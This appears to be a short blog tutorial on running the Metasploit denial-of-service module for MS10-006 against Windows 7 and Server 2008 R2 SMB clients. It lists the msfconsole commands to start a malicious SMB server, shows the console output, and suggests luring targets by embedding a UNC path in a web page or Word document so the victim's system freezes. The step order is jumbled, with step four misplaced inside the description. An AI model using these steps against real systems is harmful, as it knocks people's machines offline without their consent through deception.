This
module exploits a denial of service flaw in the Microsoft Windows SMB
client on Windows 7 and Windows Server 2008 R2. To trigger this bug,
run this module as a service and forces a vulnerable client to
access the IP of this system as an SMB server. This can be
accomplished by embedding a UNC path (\HOST\share\something) into a
web page if the target is using Internet Explorer, or a Word
(4)set
SRVHOST I.P. of local machine
document
otherwise.
(1)msfconsole
(2)use
dos/windows/smb/ms10_006_negotiate_response_loop
(3)show
options
(5)exploit
[*]
Starting the malicious SMB service...
[*]
To trigger, the vulnerable client should try to access:
\\I.P.\Shared\Anything
[*]
Server started.
If
the system that accessed that location is vulnerable, it will
immediately freeze. To get out of that state, restart the system.
No comments:
Post a Comment